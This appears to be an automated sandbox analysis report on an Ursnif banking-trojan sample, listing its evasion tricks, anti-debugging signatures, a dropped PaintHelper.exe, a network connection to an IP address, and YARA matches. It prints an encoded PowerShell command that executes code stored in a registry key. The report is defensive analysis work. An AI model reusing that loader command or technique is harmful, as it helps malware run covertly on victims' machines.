Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Contains long sleeps (>= 3 min)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Found WSH timer for Javascript or VBS script (likely evasive script)Show sources
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2891
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1599
Found evasive API chain (date check)Show sources
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_4-4625
Found evasive API chain checking for process token informationShow sources
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_4-5304
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Windows\System32\wscript.exe TID: 4808Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\wscript.exe TID: 3688Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4788Thread sleep count: 2891 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4788Thread sleep count: 1599 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4488Thread sleep time: -922337203685477s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)Show sources
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: wscript.exe, 00000000.00000002.721709131.000002A59C6C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: wscript.exe, 00000000.00000003.698787006.000002A59A69C000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWystem32\stdole2.tlbe
Source: wscript.exe, 00000000.00000003.713739652.000002A59CA05000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000002.721709131.000002A59C6C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wscript.exe, 00000000.00000002.721709131.000002A59C6C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: wscript.exe, 00000000.00000002.721709131.000002A59C6C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Program exit pointsShow sources
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeAPI call chain: ExitProcess graph end nodegraph_4-5608
Queries a list of all running processesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation

Anti Debugging:

barindex
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeCode function: 4_2_00401A88 GetModuleHandleW,LoadLibraryW,GetProcAddress,4_2_00401A88
Contains functionality which may be used to detect a debugger (GetProcessHeap)Show sources
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeCode function: 4_2_00401015 EntryPoint,GetModuleHandleA,GetProcessHeap,GetCurrentThread,WaitForSingleObject,ExitProcess,4_2_00401015
Creates guard pages, often used to prevent reverse engineering and debuggingShow sources
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeMemory protected: page execute read | page execute and read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Benign windows process drops PE filesShow sources
Source: C:\Windows\System32\wscript.exeFile created: PaintHelper.exe.0.drJump to dropped file
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\System32\wscript.exeNetwork Connect: 89.191.225.207 80Jump to behavior
Encrypted powershell cmdline option foundShow sources
Source: unknownProcess created: Base64 decoded iex (gp 'HKCU:\Software\Magiclo').R
Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded iex (gp 'HKCU:\Software\Magiclo').R
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBhAGcAaQBjAGwAbwAnACkALgBSAA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\f2oqx0oi.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4B18.tmp' 'c:\Users\user\AppData\Local\Temp\CSC77BC04006FB247D3A31CB167F1BAF8A.TMP'
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: PaintHelper.exe, 00000004.00000002.993292410.0000000000D90000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: PaintHelper.exe, 00000004.00000002.993292410.0000000000D90000.00000002.00000001.sdmpBinary or memory string: Progman
Source: PaintHelper.exe, 00000004.00000002.993292410.0000000000D90000.00000002.00000001.sdmpBinary or memory string: Progmanlock
Source: PaintHelper.exe, 00000004.00000002.993292410.0000000000D90000.00000002.00000001.sdmpBinary or memory string: =Program Managerb

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)Show sources
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeCode function: 4_2_0072857D cpuid 4_2_0072857D
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Contains functionality to query local / system timeShow sources
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeCode function: 4_2_00721308 GetSystemTimeAsFileTime,4_2_00721308
Contains functionality to query the account / user nameShow sources
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeCode function: 4_2_00419AA0 IsClipboardFormatAvailable,GetEnhMetaFileA,IsClipboardFormatAvailable,GetEnhMetaFileA,IsClipboardFormatAvailable,GetEnhMetaFileA,IsClipboardFormatAvailable,GetEnhMetaFileA,IsClipboardFormatAvailable,GetEnhMetaFileA,IsClipboardFormatAvailable,GetEnhMetaFileA,IsClipboardFormatAvailable,GetEnhMetaFileA,IsClipboardFormatAvailable,GetEnhMetaFileA,IsClipboardFormatAvailable,GetEnhMetaFileA,IsClipboardFormatAvailable,GetEnhMetaFileA,IsClipboardFormatAvailable,GetEnhMetaFileA,IsClipboardFormatAvailable,GetEnhMetaFileA,GetUserNameA,DeleteMetaFile,CreateMetaFileA,CharNextA,StrokePath,IsCharAlphaW,EndDoc,InSendMessage,GetMenuCheckMarkDimensions,GetParent,CreateMetaFileW,LoadCursorW,LoadLibraryA,GetProcAddress,4_2_00419AA0
Queries the cryptographic machine GUIDShow sources
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)Show sources
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeWMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antispywareproduct

Stealing of Sensitive Information:

barindex
Yara detected UrsnifShow sources
Source: Yara matchFile source: 00000004.00000003.714383775.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.719495034.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.716679919.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.714965520.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.716504979.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.720170005.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.713227207.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.715552523.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.716343079.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.709062333.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.719801339.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.710475610.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.719652778.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.713639378.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.720057377.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.719930329.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.715968226.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.714019466.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.712856726.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.798832924.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.715250270.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.715740770.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.711519545.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.719176551.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.711997884.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.716177520.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.708287654.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.994090175.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.720225537.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.711015828.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.709810981.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.712422696.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.714678858.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.720304550.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: PaintHelper.exe PID: 4196, type: MEMORY

Remote Access Functionality:

barindex
Yara detected UrsnifShow sources
Source: Yara matchFile source: 00000004.00000003.714383775.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.719495034.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.716679919.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.714965520.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.716504979.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.720170005.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.713227207.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.715552523.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.716343079.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.709062333.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.719801339.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.710475610.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.719652778.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.713639378.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.720057377.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.719930329.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.715968226.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.714019466.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.712856726.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.798832924.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.715250270.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.715740770.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.711519545.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.719176551.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.711997884.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.716177520.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.708287654.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.994090175.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.720225537.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.711015828.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.709810981.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.712422696.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.714678858.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.720304550.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: PaintHelper.exe PID: 4196, type: MEMORY

Malware Configuration

No configs have been found

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet